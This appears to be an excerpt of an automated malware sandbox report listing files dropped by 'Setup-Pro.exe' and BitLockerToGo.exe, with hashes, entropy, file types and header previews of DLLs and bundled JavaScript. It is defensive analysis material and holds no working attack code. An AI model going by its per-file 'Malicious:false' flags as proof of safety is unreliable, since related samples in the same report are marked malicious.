                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):685392
                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: SecuriteInfo.com.Win32.Evo-gen.28528.9811.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):608080
                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: SecuriteInfo.com.Win32.Evo-gen.28528.9811.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):450024
                                                                                                                                                              Entropy (8bit):6.673992339875127
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2046288
                                                                                                                                                              Entropy (8bit):6.787733948558952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):257872
                                                                                                                                                              Entropy (8bit):6.727482641240852
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):80880
                                                                                                                                                              Entropy (8bit):6.920480786566406
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):685392
                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):608080
                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):450024
                                                                                                                                                              Entropy (8bit):6.673992339875127
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2046288
                                                                                                                                                              Entropy (8bit):6.787733948558952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):257872
                                                                                                                                                              Entropy (8bit):6.727482641240852
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):80880
                                                                                                                                                              Entropy (8bit):6.920480786566406
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\Setup-Pro.exe
                                                                                                                                                              File Type:C++ source, ASCII text, with very long lines (324), with escape sequences
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):138639
                                                                                                                                                              Entropy (8bit):4.286369825068587
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ZMjsdRCCXpnzopj7/5dLopnQPporDa6meL4xmJ:fenLo9QP+lmeL4IJ
                                                                                                                                                              MD5:A7C8367F8B900617374F5D3FAC86DFD7
                                                                                                                                                              SHA1:6BDEAB34FA632083B2578708EB0C50443ED5E9A9
                                                                                                                                                              SHA-256:E4F82DB7579D84B2DDB49B16A8CBD8256D86751473D1A86B4B31D1E3963BA0FA
                                                                                                                                                              SHA-512:2C2E9D5445F4BDFBCA7F35881E9D133373145B40D26ECB9B122E60DD343B580FA3BC70C8B981B4AE7E3D9B8C4EA90C6A77F7328A60CBE0F2515EE364AD0CB0A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:var __webpack_modules__ = {. 821: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. module = __webpack_require__.nmd(module);. const wrapAnsi16 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${code + offset}m`;. };. const wrapAnsi256 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${38 + offset};5;${code}m`;. };. const wrapAnsi16m = (fn, offset) => (...args) => {. const rgb = fn(...args);. return `.[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;. };. const ansi2ansi = n => n;. const rgb2rgb = (r, g, b) => [ r, g, b ];. const setLazyProperty = (object, property, get) => {. Object.defineProperty(object, property, {. get: () => {. const value = get();. Object.defineProperty(object, property, {.
                                                                                                                                                              Process:C:\Users\user\Desktop\Setup-Pro.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):218125
                                                                                                                                                              Entropy (8bit):5.457704584855637
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:zKHyW445CPl85X3GJXlAnFhvMvOqGPUqdShdY5S8DoDT1JyBwJbMaky9nwe+L/Iq:LWY4KTvqd8dYQ8uJcwSy9nQ
                                                                                                                                                              MD5:0FEFBA04D8BBEDD2CFF7EB75C3834847
                                                                                                                                                              SHA1:054D11200D77C1B5DFB3B98A33973623619D34BE
                                                                                                                                                              SHA-256:DBBDB23093B0732EE1504F79D3835B1C6B2E3F526AB42A6DA381E6CEC2648AE5
                                                                                                                                                              SHA-512:3CEAA01275E2DEC044BA5F8D41092EB4F28E62CDAD24A71C8F7F57E4C48B709568C8C376BF2B048DC989810FB8EB91F2D944379804D5D85480A26663FC3F90FE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"version":3,"file":"bin/jsii-runtime.js","mappings":";;;;QAEA,MAAMA,aAAa,CAACC,IAAIC,WAAW,IAAIC;YACtC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAUC,OAAOF;AAAS;QAGlC,MAAMG,cAAc,CAACJ,IAAIC,WAAW,IAAIC;YACvC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAU,KAAKD,YAAYE;AAAO;QAG1C,MAAME,cAAc,CAACL,IAAIC,WAAW,IAAIC;YACvC,MAAMI,MAAMN,MAAME;YAClB,OAAO,KAAU,KAAKD,YAAYK,IAAI,MAAMA,IAAI,MAAMA,IAAI;AAAK;QAGhE,MAAMC,YAAYC,KAAKA;QACvB,MAAMC,UAAU,CAACC,GAAGC,GAAGC,MAAM,EAACF,GAAGC,GAAGC;QAEpC,MAAMC,kBAAkB,CAACC,QAAQC,UAAUC;YAC1CC,OAAOC,eAAeJ,QAAQC,UAAU;gBACvCC,KAAK;oBACJ,MAAMG,QAAQH;oBAEdC,OAAOC,eAAeJ,QAAQC,UAAU;wBACvCI;wBACAC,YAAY;wBACZC,cAAc;;oBAGf,OAAOF;AAAK;gBAEbC,YAAY;gBACZC,cAAc;;AACb;QAIH,IAAIC;QACJ,MAAMC,oBAAoB,CAACC,MAAMC,aAAaC,UAAUC;YACvD,IAAIL,iBAAiBM,WAAW;gBAC/BN,eAAe,oBAAQ;AACxB;YAEA,MAAMrB,SAAS0B,eAAe,KAAK;YACnC,MAAME,SAAS,CAAC;YAEhB,KAAK,OAAOC,aAAaC,UAAUd,OAAOe,QAAQV,eAAe;gBAChE,MAAMW,OAAOH,gBAAgB,WAAW,SAASA;gBACjD,IAAIA,gBAAgBL,aAAa;oBAChCI,OAAOI,QAAQT,KAAKE,UAAUzB;AAC/B,uBAAO,WAAW8B,UAAU,UAAU;oBACrCF,OAAOI,Q
                                                                                                                                                              Process:C:\Users\user\Desktop\Setup-Pro.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (489)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):802466
                                                                                                                                                              Entropy (8bit):4.298722687837962
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:Z6TjefxOXTNwk8mCkCbCp4wrZaWvZEIhU4FFEY+cbCtNYbIgoxrV2z1J:Z6TjefxOXTNUkCbCp42aW4NwL
                                                                                                                                                              MD5:4C6E1287B2F6060C1E0F386B0B47959A
                                                                                                                                                              SHA1:0FA0C721B6848D78C73FCF74BB37891A17FF0999
                                                                                                                                                              SHA-256:C8DB5A41C7EC02EB2F1F20A6CD544DB215246AD9D566EA9494D63521B9B1E271
                                                                                                                                                              SHA-512:0FF6A037A413BE93DCB3C1B4C26CB9938025F34D9AA20818FBDED5B4B00BC89DCBA9EB58756BAFBA852CA972C058BDDB087E9CB58C9B442AC936C93590E14C13
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:var __webpack_modules__ = {. 1165: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. const fs = __webpack_require__(9896);. const path = __webpack_require__(6928);. const LCHOWN = fs.lchown ? "lchown" : "chown";. const LCHOWNSYNC = fs.lchownSync ? "lchownSync" : "chownSync";. const needEISDIRHandled = fs.lchown && !process.version.match(/v1[1-9]+\./) && !process.version.match(/v10\.[6-9]/);. const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const handleEISDIR = needEISDIRHandled ? (path, uid, gid, cb) => er => {.
                                                                                                                                                              Process:C:\Users\user\Desktop\Setup-Pro.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1155588
                                                                                                                                                              Entropy (8bit):5.4159552687244155
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:D2DUMiOfGYFO/1pf0ThVUhI2PoEMuCfzT/2ZoEC74RiCfulDlJ:MZFO/1pf9hI2EjT/2ZoEC74RiCfulDlJ
                                                                                                                                                              MD5:BE06DF1EE810220598CAE6D42AE2FD77
                                                                                                                                                              SHA1:5DD0B0F101FDE69B49E37947380431D75D26125C
                                                                                                                                                              SHA-256:09E18C6FA27068005DA8BCBB802C70B1C182866274478C684A4AB652ACAF2BBD
                                                                                                                                                              SHA-512:BF40F52E37DFDBEE4AC4F562A28520893D3C8C13FDDB7A94E94458B1E8591162EADF3A4BE401A2FF6C2CE2449721F3F036C2B41571BB3C491E7F648595BAA8FA
                                                                                                                                                              Malicious:false
